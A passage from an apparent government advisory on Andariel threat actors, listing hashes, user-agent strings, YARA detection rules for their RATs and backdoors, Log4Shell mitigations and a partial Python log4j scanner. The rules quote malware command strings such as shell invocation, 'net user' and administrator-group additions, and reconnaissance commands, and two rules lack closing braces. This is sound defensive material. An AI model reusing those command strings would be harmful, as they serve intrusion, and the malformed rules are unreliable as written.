d8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4\r\n452ca47230afd4bb85c45af54fcacbfa544208ef8b4604c3c5caefe3a64dcc19\r\n199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1\r\n2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc\r\nce779e30502ecee991260fd342cc0d7d5f73d1a070395b4120b8d300ad11d694\r\nc28bb61de4a6ad1c5e225ad9ec2eaf4a6c8ccfff40cf45a640499c0adb0d8740\r\n34d5a5d8bec893519f204b573c33d54537b093c52df01b3d8c518af08ee94947\r\n664f8d19af3400a325998b332343a9304f03bab9738ddab1530869eff13dae54\r\n772b06f34facf6a2ce351b8679ff957cf601ef3ad29645935cb050b4184c8d51\r\naa29bf4292b68d197f4d8ca026b97ec7785796edcb644db625a8f8b66733ab54\r\n9a5504dcfb7e664259bfa58c46cfd33e554225daf1cedea2ec2a9d83bbbfe238\r\nc2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c\r\n8aa6612c95c7cef4970959
6da43a0f8354f14d8c08128c4cb9b1f37e548f083b\r\n38f0f2d658e09c57fc78698482f2f638843eb53412d860fb3a99bb6f51025b07\r\nThe following include a list of user agent strings used by the actors:\r\nMozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\r\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nMozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0\r\nMozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nMozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\r\nMozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\r\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\r\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nMozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\r\nDetection Methods\r\nSee Table 2 for YARA rules, created by the FBI, authoring partners, and private industry, that can be used to detect\r\nmalware used by the actors.\r\nTable 2. 
YARA Rules\r\nrule Andariel_ScheduledTask_Loader\r\n{\r\n    strings:\r\n        $obfuscation1 = { B8 02 00 00 00 48 6B C0 00 B9 CD FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00\r\n00 48 6B C0 01 B9 CC FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 02 B9 8D FF 00 00 66\r\n89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 03 B9 9A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00\r\n48 6B C0 04 B9 8C FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 05 B9 8A FF 00 00 66 89 8C\r\n04 60 01 00 00 B8 02 00 00 00 48 6B C0 06 33 C9 66 89 8C 04 60 01 00 00 }\r\n                             $obfuscation2 = { 48 6B C0 02 C6 44 04 20 BA B8 01 00 00 00 48 6B C0 03 C6 44 04 20\r\n9A B8 01 00 00 00 48 6B C0 04 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 05 C6 44 04 20 8A B8 01 00 00 00\r\n48 6B C0 06 C6 44 04 20 9C B8 01 00 00 00 }\r\n                             $obfuscation3 = { 48 6B C0 00 C6 44 04 20 A8 B8 01 00 00 00 48 6B C0 01 C6 44 04 20\r\n9A B8 01 00 00 00 48 6B C0 02 C6 44 04 20 93 B8 01 00 00 00 48 6B C0 03 C6 44 04 20 96 B8 01 00 00 00\r\n48 6B C0 04 C6 44 04 20 B9 B8 01 00 00 00 48 6B C0 05 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 06 C6\r\n44 04 20 8B B8 01 00 00 00 48 6B C0 07 C6 44 04 20 9E B8 01 00 00 00 48 6B C0 08 C6 44 04 20 9A B8 01\r\n00 00 00 48 6B C0 09 C6 44 04 20 8D B8 01 00 00 00 48 6B C0 0A C6 44 04 20 BC B8 01 00 00 00 }\r\n    condition:\r\n        uint16(0) == 0x5A4D and $obfuscation1 and $obfuscation2 and $obfuscation3\r\n}\r\nrule Andariel_KaosRAT_Yamabot\r\n{\r\n    strings:\r\n        $str1 = \"/kaos/\"\r\n        $str2 = \"Abstand [\"\r\n        $str3 = \"] anwenden\"\r\n        $str4 = \"cmVjYXB0Y2hh\"\r\n        $str5 = \"/bin/sh\"\r\n        $str6 = \"utilities.CIpaddress\"\r\n        $str7 = \"engine.NewEgg\"\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 12 of 31\n\n$str8 = \"%s%04x%s%s%s\"\r\n        $str9 = \"Y2FwdGNoYV9zZXNzaW9u\"\r\n        $str10 = \"utilities.EierKochen\"\r\n        $str11 = 
\"kandidatKaufhaus\"\r\n    condition:\r\n        3 of them\r\n}\r\nrule TriFaux_EasyRAT_JUPITER\r\n{\r\n    strings:\r\n        $InitOnce = \"InitOnceExecuteOnce\"\r\n        $BREAK = { 0D 00 0A 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D\r\n00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D\r\n00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 0D 00 0A }\r\n                             $Bytes =\r\n\"4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,\" wide\r\n    condition:\r\n        uint16(0) == 0x5a4d and all of them\r\n}\r\nrule Andariel_CutieDrop_MagicRAT\r\n{\r\n              strings:\r\n                             $config_os_w = \"os/windows\" ascii wide\r\n                             $config_os_l = \"os/linux\" ascii wide\r\n                             $config_os_m = \"os/mac\" ascii wide\r\n                             $config_comp_msft = \"company/microsoft\" ascii wide\r\n                             $config_comp_orcl = \"company/oracle\" ascii wide\r\n                             $POST_field_1 = \"session=\" ascii wide\r\n                             $POST_field_2 = \"type=\" ascii wide\r\n                             $POST_field_3 = \"id=\" ascii wide\r\n                             $command_misspelled = \"renmae\" ascii wide\r\n              condition:\r\n                             uint16(0) == 0x5a4d and 7 of them\r\nrule Andariel_hhsd_FileTransferTool\r\n{\r\n    strings:\r\n        // 30 4D C7                xor     [rbp+buffer_v41+3], cl\r\n        // 81 7D C4 22 C0 78 00    cmp      dword ptr [rbp+buffer_v41], 78C022h\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 13 of 31\n\n// 44 88 83 00 01 00 00    mov      [rbx+100h], r8b\r\n        $handshake = { 30 ?? ?? 81 7? ?? 22 C0 78 00 4? 
88 }\r\n                // B1 14                   mov     cl, 14h\r\n        // C7 45 F7 14 00 41 00    mov      [rbp+57h+Src], 410014h\r\n        // C7 45 FB 7A 00 7F 00    mov      [rbp+57h+var_5C], 7F007Ah\r\n        // C7 45 FF 7B 00 63 00    mov     [rbp+57h+var_58], 63007Bh\r\n        // C7 45 03 7A 00 34 00    mov      [rbp+57h+var_54], 34007Ah\r\n        // C7 45 07 51 00 66 00    mov      [rbp+57h+var_50], 660051h\r\n        // C7 45 0B 66 00 7B 00    mov      [rbp+57h+var_4C], 7B0066h\r\n        // C7 45 0F 66 00 00 00    mov      [rbp+57h+var_48], 66h ; 'f'\r\n        $err_xor_str = { 14 C7 [2] 14 00 41 00 C7 [2] 7A 00 7F 00 C7 [2] 7B 00 63 00 C7 [2] 7A 00 34 00 }\r\n                // 41 02 D0                add     dl, r8b\r\n        // 44 02 DA                add     r11b, dl\r\n        // 3C 1F                   cmp     al, 1Fh\r\n        $buf_add_cmp_1f = { 4? 02 ?? 4? 02 ?? 3? 1F }\r\n        // B9 8D 10 B7 F8          mov     ecx, 0F8B7108Dh\r\n        // E8 F1 BA FF FF          call    sub_140001280\r\n        $hash_call_loadlib = { B? 8D 10 B7 F8 E8 }\r\n        $hash_call_unk = { B? 
91 B8 F6 88 E8 }\r\n            condition:\r\n        uint16(0) == 0x5a4d and\r\n        (any of ($handshake, $err_xor_str, $buf_add_cmp_1f) and any of ($hash_call_*)) or\r\n        2 of ($handshake, $err_xor_str, $buf_add_cmp_1f)\r\nrule Andariel_Atharvan_3RAT\r\n{\r\nstrings:\r\n$3RAT = \"D:\\\\rang\\\\TOOL\\\\3RAT\" \r\n$atharvan = \"Atharvan_dll.pdb\"\r\ncondition:\r\nuint16(0) == 0x5a4d and any of them\r\n}\r\nrule Andariel_LilithRAT_Variant\r\n{\r\n    strings:\r\n        // The following are strings seen in the open source version of Lilith\r\n        $lilith_1 = \"Initiate a CMD session first.\" ascii wide\r\n        $lilith_2 = \"CMD is not open\" ascii wide\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 14 of 31\n\n$lilith_3 = \"Couldn't write command\" ascii wide\r\n        $lilith_4 = \"Couldn't write to CMD: CMD not open\" ascii wide\r\n        // The following are strings that appear to be unique to the Unnamed Trojan based on Lilith\r\n        $unique_1 = \"Upload Error!\" ascii wide\r\n        $unique_2 = \"ERROR: Downloading is already running!\" ascii wide\r\n        $unique_3 = \"ERROR: Unable to open file:\" ascii wide\r\n        $unique_4 = \"General error\" ascii wide\r\n        $unique_5 = \"CMD error\" ascii wide\r\n        $unique_6 = \"killing self\" ascii wide\r\n    condition:\r\n        uint16(0) == 0x5a4d and filesize \u003c 150KB and all of ($lilith_*) and 2 of ($unique_*)\r\n}\r\nrule Andariel_SocksTroy_Strings_OpCodes\r\n{\r\n       strings:\r\n        $strHost = \"-host\" wide\r\n        $strAuth = \"-auth\" wide\r\n        $SocksTroy = \"SocksTroy\" \r\n        $cOpCodeCheck = { 81 E? A0 00 00 00 0F 84 ?? ?? ?? ?? 83 E? 03 74 ?? 83 E? 02 74 ?? 83 F? 0B }\r\n    condition:\r\n        uint16(0) == 0x5a4d and\r\n        ((1 of ($str*)) and \r\n        (all of ($c*)) or (all of ($Socks*)))\r\n}\r\nrule Andariel_Agni\r\n{\r\n    strings:\r\n        $xor = { 34 ?? 
88 01 48 8D 49 01 0F B6 01 84 C0 75 F1 }\r\n        $stackstrings = { C7 44 24 [5-10] C7 44 24 [5] C7 44 24 [5-10] C7 44 24 [5-10] C7 44 24 }\r\n    condition:\r\n        uint16(0) == 0x5a4d and (#xor \u003e 100 and #stackstrings \u003e 5)\r\n}\r\nrule Andariel_GoLang_validalpha_handshake\r\n{\r\n    strings:\r\n        $ = { 66 C7 00 AB CD C6 40 02 EF ?? 03 00 00 00 48 89 C1 ?? 03 00 00 00 }\r\n    condition:\r\n        all of them\r\n}\r\nrule Andariel_GoLang_validalpha_tasks\r\n{\r\n    strings:\r\n        $ = \"main.ScreenMonitThread\"\r\n        $ = \"main.CmdShell\"\r\n        $ = \"main.GetAllFoldersAndFiles\"\r\n        $ = \"main.SelfDelete\"\r\n    condition:\r\n        all of them\r\n}\r\nrule Andariel_GoLang_validalpha_BlackString\r\n{\r\n    strings:\r\n        $ = \"I:/01___Tools/02__RAT/Black\"\r\n    condition:\r\n        uint16(0) == 0x5A4D and all of them\r\n}\r\n// The two INDICATOR_EXE_Packed rules below use the pe module, which must be imported.\r\nimport \"pe\"\r\nrule INDICATOR_EXE_Packed_VMProtect {\r\n    strings:\r\n        $s1 = \".vmp0\" fullword ascii\r\n        $s2 = \".vmp1\" fullword ascii\r\n    condition:\r\n        uint16(0) == 0x5a4d and all of them or\r\n        for any i in (0 .. pe.number_of_sections) : (\r\n            (\r\n                pe.sections[i].name == \".vmp0\" or\r\n                pe.sections[i].name == \".vmp1\"\r\n            )\r\n        )\r\n}\r\nrule INDICATOR_EXE_Packed_Themida {\r\n    strings:\r\n        $s1 = \".themida\" fullword ascii\r\n    condition:\r\n        uint16(0) == 0x5a4d and all of them or\r\n        for any i in (0 .. 
pe.number_of_sections) : (\r\n            (\r\n                pe.sections[i].name == \".themida\"\r\n            )\r\n        )\r\n}\r\nrule Andariel_elf_backdoor_fipps\r\n{\r\n    strings:\r\n        $a = \"found mac address\"\r\n        $b = \"RecvThread\"\r\n        $c = \"OpenSSL-1.0.0-fipps\"\r\n        $d = \"Disconnected!\"\r\n    condition:\r\n        (all of them) and uint32(0) == 0x464c457f\r\n}\r\nrule Andariel_bindshell\r\n{\r\n    strings:\r\n        $str_comspec = \"COMSPEC\"\r\n        $str_consolewindow = \"GetConsoleWindow\"\r\n        $str_ShowWindow = \"ShowWindow\"\r\n        $str_WSASocketA = \"WSASocketA\"\r\n        $str_CreateProcessA = \"CreateProcessA\"\r\n        // B9 4D 05 00 00 = mov ecx, 54Dh (decimal 1357)\r\n        $str_port = { B9 4D 05 00 00 89 }\r\n    condition:\r\n        uint16(0) == 0x5A4D and all of them\r\n}\r\nrule Andariel_grease2\r\n{\r\n    strings:\r\n        $str_rdpconf = \"c: \\\\windows\\\\temp\\\\RDPConf.exe\" fullword nocase\r\n        $str_rdpwinst = \"c: \\\\windows\\\\temp\\\\RDPWInst.exe\" fullword nocase\r\n        $str_net_user = \"net user\"\r\n        $str_admins_add = \"net localgroup administrators\"\r\n    condition:\r\n        uint16(0) == 0x5A4D and all of them\r\n}\r\nrule Andariel_NoPineapple_Dtrack_unpacked\r\n{\r\n    strings:\r\n        $str_nopineapple = \"\u003c No Pineapple! \u003e\"\r\n        $str_qt_library = \"Qt 5.12.10\"\r\n        $str_xor = { 8B 10 83 F6 ?? 
83 FA 01 77 }\r\n    condition:\r\n        uint16(0) == 0x5A4D and all of them\r\n}\r\nrule Andariel_dtrack_unpacked\r\n{\r\n    strings:\r\n        $str_mutex = \"MTX_Global\"\r\n        $str_cmd_1 = \"/c net use \\\\\\\\\" wide\r\n        $str_cmd_2 = \"/c ping -n 3 127.0.01 \u003e NUL % echo EEE \u003e \\\"%s\\\"\" wide\r\n        $str_cmd_3 = \"/c move /y %s \\\\\\\\\" wide\r\n        $str_cmd_4 = \"/c systeminfo \u003e \\\"%s\\\" \u0026 tasklist \u003e \\\"%s\\\" \u0026 netstat -naop tcp \u003e \\\"%s\\\"\" wide\r\n    condition:\r\n        uint16(0) == 0x5A4D and all of them\r\n}\r\nrule Andariel_TigerRAT_crowdsourced_rule {\r\n    strings:\r\n        $m1 = \".?AVModuleKeyLogger@@\" fullword ascii\r\n        $m2 = \".?AVModulePortForwarder@@\" fullword ascii\r\n        $m3 = \".?AVModuleScreenCapture@@\" fullword ascii\r\n        $m4 = \".?AVModuleShell@@\" fullword ascii\r\n        $s1 = \"\\\\x9891-009942-xnopcopie.dat\" fullword wide\r\n        $s2 = \"(%02d : %02d-%02d %02d:%02d:%02d)--- %s[Clipboard]\" fullword ascii\r\n        $s3 = \"[%02d : %02d-%02d %02d:%02d:%02d]--- %s[Title]\" fullword ascii\r\n        $s4 = \"del \\\"%s\\\"%s \\\"%s\\\" goto \" ascii\r\n        $s5 = \"[\u003c\u003c]\" fullword ascii\r\n    condition:\r\n        uint16(0) == 0x5a4d and (all of ($s*) or (all of ($m*) and 1 of ($s*)) or (2 of ($m*) and 2 of ($s*)))\r\n}\r\n// Auto-generated rule: only the hex sequences are matched by YARA; the per-byte\r\n// disassembly comments do not line up with the bytes and are informational only.\r\nrule win_tiger_rat_auto {\r\n    strings:\r\n        $sequence_0 = { 33c0 89442438 89442430 448bcf 4533c0 }\r\n            // n = 5, score = 200\r\n            //   33c0                 | jmp                 5\r\n            //   89442438             | dec                 eax\r\n            //   89442430             | mov                 eax, ecx\r\n            //   448bcf               | movzx               eax, byte ptr [eax]\r\n            //   4533c0               | dec                 eax\r\n        $sequence_1 = { 41b901000000 488bd6 488bcb e8???????? 
}\r\n            // n = 4, score = 200\r\n            //   41b901000000         | dec                 eax\r\n            //   488bd6                | mov                 eax, dword ptr [ecx]\r\n            //   488bcb               | jmp                 8\r\n            //   e8????????           |                     \r\n        $sequence_2 = { 4881ec90050000 8b01 8985c8040000 8b4104 }\r\n            // n = 4, score = 200\r\n            //   4881ec90050000       | test                eax, eax\r\n            //   8b01                 | jns                 0x16\r\n            //   8985c8040000         | dec                 eax\r\n            //   8b4104               | mov                 eax, dword ptr [ecx]\r\n        $sequence_3 = { 488b01 ff10 488b4f08 4c8d4c2430 }\r\n            // n = 4, score = 200\r\n            //   488b01               | mov                 edx, esi\r\n            //   ff10                 | dec                 eax\r\n            //   488b4f08             | mov                 ecx, ebx\r\n            //   4c8d4c2430           | inc                 ecx\r\n        $sequence_4 = { 488b01 ff10 488b4e18 488b01 }\r\n            // n = 4, score = 200\r\n            //   488b01               | dec                 eax\r\n            //   ff10                 | cmp                 dword ptr [ecx + 0x18], 0x10\r\n            //   488b4e18             | dec                 eax\r\n            //   488b01               | sub                 esp, 0x590\r\n        $sequence_5 = { 4881eca0000000 33c0 488bd9 488d4c2432 }\r\n            // n = 4, score = 200\r\n            //   4881eca0000000       | mov                 eax, dword ptr [ecx]\r\n            //   33c0                 | mov                 dword ptr [ebp + 0x4c8], eax\r\n            //   488bd9               | mov                 eax, dword ptr [ecx + 4]\r\n            //   488d4c2432           | mov                 dword ptr [ebp + 0x4d0], eax\r\n        $sequence_6 = { 488b01 eb03 488bc1 0fb600 
}\r\n            // n = 4, score = 200\r\n            //   488b01               | inc                 ecx\r\n            //   eb03                 | mov                 ebx, dword ptr [ebp + ebp]\r\n            //   488bc1               | inc                 ecx\r\n            //   0fb600               | movups              xmmword ptr [edi], xmm0\r\n        $sequence_7 = { 488b01 8b10 895124 448b4124 4585c0 }\r\n            // n = 5, score = 200\r\n            //   488b01               | sub                 esp, 0x30\r\n            //   8b10                 | dec                 ecx\r\n            //   895124               | mov                 ebx, eax\r\n            //   448b4124             | dec                 eax\r\n            //   4585c0               | mov                 ecx, eax\r\n        $sequence_8 = { 4c8d0d31eb0000 c1e918 c1e808 41bf00000080 }\r\n            // n = 4, score = 100\r\n            //   4c8d0d31eb0000       | jne                 0x1e6\r\n            //   c1e918               | dec                 eax\r\n            //   c1e808               | lea                 ecx, [0xbda0]\r\n            //   41bf00000080         | dec                 esp\r\n        $sequence_9 = { 488bd8 4885c0 752d ff15???????? 83f857 0f85e0010000 488d0da0bd0000 }\r\n            // n = 7, score = 100\r\n            //   488bd8               | dec                 eax\r\n            //   4885c0               | mov                 ebx, eax\r\n            //   752d                 | dec                 eax\r\n            //   ff15????????         
|                     \r\n            //   83f857               | test                eax, eax\r\n            //   0f85e0010000         | jne                 0x2f\r\n            //   488d0da0bd0000       | cmp                 eax, 0x57\r\n        $sequence_10 = { 75d4 488d1d7f6c0100 488b4bf8 4885c9 740b }\r\n            // n = 5, score = 100\r\n            //   75d4                 | lea                 ecx, [0xeb31]\r\n            //   488d1d7f6c0100       | shr                 ecx, 0x18\r\n            //   488b4bf8             | shr                 eax, 8\r\n            //   4885c9               | inc                 ecx\r\n            //   740b                 | mov                 edi, 0x80000000\r\n        $sequence_11 = { 0f85d9000000 488d15d0c90000 41b810200100 488bcd e8???????? eb6b b9f4ffffff }\r\n            // n = 7, score = 100\r\n            //   0f85d9000000         | jne                 0xffffffd6\r\n            //   488d15d0c90000       | dec                 eax\r\n            //   41b810200100         | lea                 ebx, [0x16c7f]\r\n            //   488bcd               | dec                 eax\r\n            //   e8????????           |                     \r\n            //   eb6b                 | mov                 ecx, dword ptr [ebx - 8]\r\n            //   b9f4ffffff           | dec                 eax\r\n        $sequence_12 = { 48890d???????? 488905???????? 488d05ae610000 488905???????? 488d05a0550000 488905???????? }\r\n            // n = 6, score = 100\r\n            //   48890d????????       |                     \r\n            //   488905????????       |                     \r\n            //   488d05ae610000       | test                ecx, ecx\r\n            //   488905????????       |                     \r\n            //   488d05a0550000       | je                  0x10\r\n            //   488905????????       
|                     \r\n        $sequence_13 = { 8bcf e8???????? 488b7c2448 85c0 0f8440030000 488d0560250100 }\r\n            // n = 6, score = 100\r\n            //   8bcf                  | mov                 eax, 0x12010\r\n            //   e8????????           |                     \r\n            //   488b7c2448           | dec                 eax\r\n            //   85c0                 | mov                 ecx, ebp\r\n            //   0f8440030000         | jmp                 0x83\r\n            //   488d0560250100       | mov                 ecx, 0xfffffff4\r\n        $sequence_14 = { ff15???????? 8b05???????? 2305???????? ba02000000 33c9 8905????????\r\n8b05???????? }\r\n            // n = 7, score = 100\r\n            //   ff15????????         |                     \r\n            //   8b05????????         |                     \r\n            //   2305????????         |                     \r\n            //   ba02000000           | dec                 eax\r\n            //   33c9                 | lea                 eax, [0x61ae]\r\n            //   8905????????         |                     \r\n            //   8b05????????         |                     \r\n        $sequence_15 = { 4883ec30 498bd8 e8???????? 488bc8 4885c0 }\r\n            // n = 5, score = 100\r\n            //   4883ec30             | jne                 0xdf\r\n            //   498bd8               | dec                 eax\r\n            //   e8????????           |                     \r\n            //   488bc8               | lea                 edx, [0xc9d0]\r\n            //   4885c0               | inc                 ecx\r\n    condition:\r\n        7 of them and filesize \u003c 557056\r\n}\r\nrule win_dtrack_auto {\r\n    strings:\r\n        $sequence_0 = { 52 8b4508 50 e8???????? 
83c414 8b4d10 51 }\r\n            // n = 7, score = 400\r\n            //   52                   | push                edx\r\n            //   8b4508               | mov                 eax, dword ptr [ebp + 8]\r\n            //   50                   | push                eax\r\n            //   e8????????           |                     \r\n            //   83c414               | add                 esp, 0x14\r\n            //   8b4d10               | mov                 ecx, dword ptr [ebp + 0x10]\r\n            //   51                   | push                ecx\r\n        $sequence_1 = { 3a4101 7523 83854cf6ffff02 838550f6ffff02 80bd4af6ffff00 75ae c78544f6ffff00000000 }\r\n            // n = 7, score = 300\r\n            //   3a4101               | cmp                 al, byte ptr [ecx + 1]\r\n            //   7523                 | jne                 0x25\r\n            //   83854cf6ffff02       | add                 dword ptr [ebp - 0x9b4], 2\r\n            //   838550f6ffff02       | add                 dword ptr [ebp - 0x9b0], 2\r\n            //   80bd4af6ffff00       | cmp                 byte ptr [ebp - 0x9b6], 0\r\n            //   75ae                 | jne                 0xffffffb0\r\n            //   c78544f6ffff00000000 | mov                 dword ptr [ebp - 0x9bc], 0\r\n        $sequence_2 = { 50 ff15???????? a3???????? 68???????? e8???????? 83c404 50 }\r\n            // n = 7, score = 300\r\n            //   50                   | push                eax\r\n            //   ff15????????         |                     \r\n            //   a3????????           |                     \r\n            //   68????????           |                     \r\n            //   e8????????           
|                     \r\n            //   83c404               | add                 esp, 4\r\n            //   50                   | push                eax\r\n        $sequence_3 = { 8d8dd4faffff 51 e8???????? 83c408 8b15???????? }\r\n            // n = 5, score = 300\r\n            //   8d8dd4faffff         | lea                 ecx, [ebp - 0x52c]\r\n            //   51                   | push                ecx\r\n            //   e8????????           |                     \r\n            //   83c408               | add                 esp, 8\r\n            //   8b15????????         |                     \r\n        $sequence_4 = { 8855f5 6a5c 8b450c 50 e8???????? }\r\n            // n = 5, score = 300\r\n            //   8855f5               | mov                 byte ptr [ebp - 0xb], dl\r\n            //   6a5c                 | push                0x5c\r\n            //   8b450c               | mov                 eax, dword ptr [ebp + 0xc]\r\n            //   50                   | push                eax\r\n            //   e8????????           |                     \r\n        $sequence_5 = { 51 e8???????? 83c410 8b558c 52 }\r\n            // n = 5, score = 300\r\n            //   51                   | push                ecx\r\n            //   e8????????           |                     \r\n            //   83c410               | add                 esp, 0x10\r\n            //   8b558c               | mov                 edx, dword ptr [ebp - 0x74]\r\n            //   52                   | push                edx\r\n        $sequence_6 = { 8b4d0c 51 68???????? 8d9560eaffff 52 e8???????? }\r\n            // n = 6, score = 300\r\n            //   8b4d0c               | mov                 ecx, dword ptr [ebp + 0xc]\r\n            //   51                   | push                ecx\r\n            //   68????????           
|                     \r\n            //   8d9560eaffff         | lea                 edx, [ebp - 0x15a0]\r\n            //   52                   | push                edx\r\n            //   e8????????           |                     \r\n        $sequence_7 = { 83c001 8945f4 837df420 7d2c 8b4df8 }\r\n            // n = 5, score = 300\r\n            //   83c001               | add                 eax, 1\r\n            //   8945f4               | mov                 dword ptr [ebp - 0xc], eax\r\n            //   837df420             | cmp                 dword ptr [ebp - 0xc], 0x20\r\n            //   7d2c                 | jge                 0x2e\r\n            //   8b4df8               | mov                 ecx, dword ptr [ebp - 8]\r\n        $sequence_8 = { 83c001 89856cf6ffff 8b8d70f6ffff 8a11 }\r\n            // n = 4, score = 300\r\n            //   83c001               | add                 eax, 1\r\n            //   89856cf6ffff         | mov                 dword ptr [ebp - 0x994], eax\r\n            //   8b8d70f6ffff         | mov                 ecx, dword ptr [ebp - 0x990]\r\n            //   8a11                 | mov                 dl, byte ptr [ecx]\r\n        $sequence_9 = { 0355f0 0fb602 0fb64df7 33c1 0fb655fc 33c2 }\r\n            // n = 6, score = 200\r\n            //   0355f0               | add                 edx, dword ptr [ebp - 0x10]\r\n            //   0fb602               | movzx               eax, byte ptr [edx]\r\n            //   0fb64df7             | movzx               ecx, byte ptr [ebp - 9]\r\n            //   33c1                 | xor                 eax, ecx\r\n            //    0fb655fc             | movzx               edx, byte ptr [ebp - 4]\r\n            //   33c2                 | xor                 eax, edx\r\n        $sequence_10 = { d1e9 894df8 8b5518 8955fc c745f000000000 }\r\n            // n = 5, score = 200\r\n            //   d1e9                 | shr                 ecx, 
1\r\n            //   894df8               | mov                 dword ptr [ebp - 8], ecx\r\n            //   8b5518               | mov                 edx, dword ptr [ebp + 0x18]\r\n            //   8955fc               | mov                 dword ptr [ebp - 4], edx\r\n            //   c745f000000000       | mov                 dword ptr [ebp - 0x10], 0\r\n        $sequence_11 = { 8b4df0 3b4d10 0f8d90000000 8b5508 0355f0 0fb602 }\r\n            // n = 6, score = 200\r\n            //   8b4df0               | mov                 ecx, dword ptr [ebp - 0x10]\r\n            //   3b4d10               | cmp                 ecx, dword ptr [ebp + 0x10]\r\n            //   0f8d90000000         | jge                 0x96\r\n            //   8b5508               | mov                 edx, dword ptr [ebp + 8]\r\n            //   0355f0               | add                 edx, dword ptr [ebp - 0x10]\r\n            //   0fb602               | movzx               eax, byte ptr [edx]\r\n        $sequence_12 = { 894d14 8b45f8 c1e018 8b4dfc c1e908 0bc1 }\r\n            // n = 6, score = 200\r\n            //   894d14               | mov                 dword ptr [ebp + 0x14], ecx\r\n            //   8b45f8               | mov                 eax, dword ptr [ebp - 8]\r\n            //   c1e018               | shl                 eax, 0x18\r\n            //   8b4dfc               | mov                 ecx, dword ptr [ebp - 4]\r\n            //   c1e908               | shr                 ecx, 8\r\n            //   0bc1                 | or                  eax, ecx\r\n        $sequence_13 = { 0bc1 894518 8b5514 8955f8 }\r\n            // n = 4, score = 200\r\n            //   0bc1                 | or                  eax, ecx\r\n            //   894518               | mov                 dword ptr [ebp + 0x18], eax\r\n            //   8b5514               | mov                 edx, dword ptr [ebp + 
0x14]\r\n            //   8955f8               | mov                 dword ptr [ebp - 8], edx\r\n        $sequence_14 = { 8b5514 8955f8 8b4518 8945fc e9???????? 8be5 }\r\n            // n = 6, score = 200\r\n            //   8b5514               | mov                 edx, dword ptr [ebp + 0x14]\r\n            //   8955f8               | mov                 dword ptr [ebp - 8], edx\r\n            //   8b4518               | mov                 eax, dword ptr [ebp + 0x18]\r\n            //   8945fc               | mov                 dword ptr [ebp - 4], eax\r\n            //   e9????????           |                     \r\n            //   8be5                 | mov                 esp, ebp\r\n    condition:\r\n        7 of them and filesize \u003c 1736704\r\n}\r\nMitigation Measures\r\nThe authoring agencies recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity.\r\nLog4Shell and Other Log4j Vulnerabilities\r\nDefenders should consult the joint Cybersecurity Advisory titled “Mitigating Log4Shell and Other Log4j-Related Vulnerabilities” and CISA’s “Apache Log4j Vulnerability” guidance. Organizations can mitigate the risks posed by the vulnerability by identifying assets affected by Log4Shell and other Log4j-related vulnerabilities and upgrading Log4j assets and affected products to the latest version. 
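The inventory step above (find every copy of Log4j, then upgrade it) is where most organizations struggled in practice, because log4j-core is usually embedded inside WAR, EAR and fat-JAR archives rather than installed as a top-level file. The scanner below is an added example written for this page, not tooling from the advisory or its authoring agencies. It recurses into nested zip-based archives, reads the version from the Maven pom.properties that every log4j-core build carries, and checks whether JndiLookup.class is still present, labelling 2.x builds below 2.15.0 that still contain the class as Log4Shell-vulnerable and anything below 2.17.0 as needing the upgrade the advisory recommends. The sample WAR is constructed in memory so the script runs offline; the status labels and the nested-archive suffix list are the example's own choices.

```python
import io
import re
import zipfile
from typing import List, Optional, Tuple

# Maven metadata shipped in official log4j-core jars (real entry paths).
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Zip-based containers that commonly embed log4j-core (this example's list).
NESTED_SUFFIXES = (".jar", ".war", ".ear", ".zip")

Version = Tuple[int, int, int]
Finding = Tuple[str, str, bool, str]  # (path, version, jndi_present, status)


def parse_version(pom_properties: str) -> Optional[Version]:
    """Read 'version=2.14.1' (or '2.0-beta9') from pom.properties as (major, minor, patch)."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", pom_properties, re.MULTILINE)
    if not m:
        return None
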